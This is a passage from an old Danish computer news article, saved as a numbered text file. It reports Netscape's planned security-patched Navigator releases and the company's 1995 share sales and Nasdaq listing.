  2086. hvorfra brugerne kan downloade det. En opdateret version af Netscape Navigator
  2087. 1.1 til Mac OS, Unix og af Netscape Navigator 1.2 til Windows 3.1 og Windows 95
  2088. vil kunne downloades af eksisterende brugere af Internet i næste uge. Desuden
  2089. vil version 2.0 af Netscape Navigator, som kommer i beta-versioner i næste uge,
  2090. også indeholde dette supplement såvel som et antal yderligere sikkerheds-
  2091. foranstaltninger, lyder det i budskabet fra Netscape.
  2092.  
  2093.         Virksomheden Netscape, som blev stiftet sidste år, hentede i april
  2094. måned 17 millioner dollars til huse ved at sælge 11 procent af aktierne i sel-
  2095. skabet. Bland andet k¢bte ComputerWorlds moderselskab, IDG, en andel på to pro-
  2096. cent. I august måned gik Netscape på Nasdaq-b¢rsen med salg af 3,5 millioner
  2097. aktier til priser mellem 12 og 14 dollars, og firmaet betegnes som et af de
  2098. mest interessante foretagender i Internet-software industrien.
  2099.  
  2100.  
  2101.  
  2102.  
  2103.  
  2104. ENDEX
  2105.